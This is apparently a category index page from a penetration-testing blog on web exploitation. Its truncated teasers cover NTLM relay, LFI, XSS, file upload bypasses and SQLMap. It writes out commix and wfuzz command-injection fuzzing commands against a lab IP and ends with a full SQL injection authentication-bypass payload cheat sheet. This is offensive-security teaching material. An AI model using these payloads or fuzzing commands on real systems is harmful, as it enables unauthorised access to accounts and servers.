Category: Category: Web Exploiting
NTLM and SMB Relay Attack
So this post is basically about why it is important to use Kerberos instead of NTLM and use SMB […]
Read More →Local File Inclusion (LFI)
Scripts that takes filenames as parameters without sanitizing the user input is typically good candidates for LFI vulnerabilities. For […]
Read More →Java Signed Applet Attack
Java Signed Applet Attack is a Client Side exploit and is based on a human vulnerability as opposted to […]
Read More →XSS – Cross Site Scripting
BeeF Framework BeeF is native in Kali and is a browser exploitation framework. From the vulnerable website insert below […]
Read More →Command Injection – Tools and methods
Below is a list of common tools and methods to test for command injection. Commix
1 2 |
commix -r /home/workdir/email.req –auth-cred=admin:password –all –batch –level 3 |
wfuzz
1 2 |
wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b “PHPSESSID=077dn044qmuh2ut41tksedvlv2” -d “check=FUZZ” http://10.10.10.105/diag.php |
curl […]
Read More →SQLMap
SQLMap is a tool that can be used to automate scanning and exploiting of SQL Injection. Below is some […]
Read More →SQL Injection – RCE and LFI Methods
Upload PHP Command Injection Following can be used to get RCE / Command Execution when target is vulnerable to […]
Read More →Bypassing File Upload Restrictions
Common techniques to bypass File upload restrictions on web sites. Change the Content-Type parameter in the request header using […]
Read More →Bypassing Authentication with SQLi
SQL Injection – Authentication Bypass Cheatsheet
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- - or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or ‘1'='1 admin' or ‘1'='1'-- admin' or ‘1'='1'# admin' or ‘1'='1'/* admin'or 1=1 or ‘'=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or (‘1'='1 admin') or (‘1'='1'-- admin') or (‘1'='1'# admin') or (‘1'='1'/* admin') or ‘1'='1 admin') or ‘1'='1'-- admin') or ‘1'='1'# admin') or ‘1'='1'/* 1234 ‘ AND 1=0 UNION ALL SELECT ‘admin', ‘81dc9bdb52d04dc20036dbd8313ed055 admin' -- admin' # admin'/* admin' or “1'='1 admin' or “1'='1'-- admin' or “1'='1'# admin' or “1'='1'/* admin'or 1=1 or “'=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or (“1'='1 admin') or (“1'='1'-- admin') or (“1'='1'# admin') or (“1'='1'/* admin') or “1'='1 admin') or “1'='1'-- admin') or “1'='1'# admin') or “1'='1'/* 1234 “ AND 1=0 UNION ALL SELECT “admin', “81dc9bdb52d04dc20036dbd8313ed055 |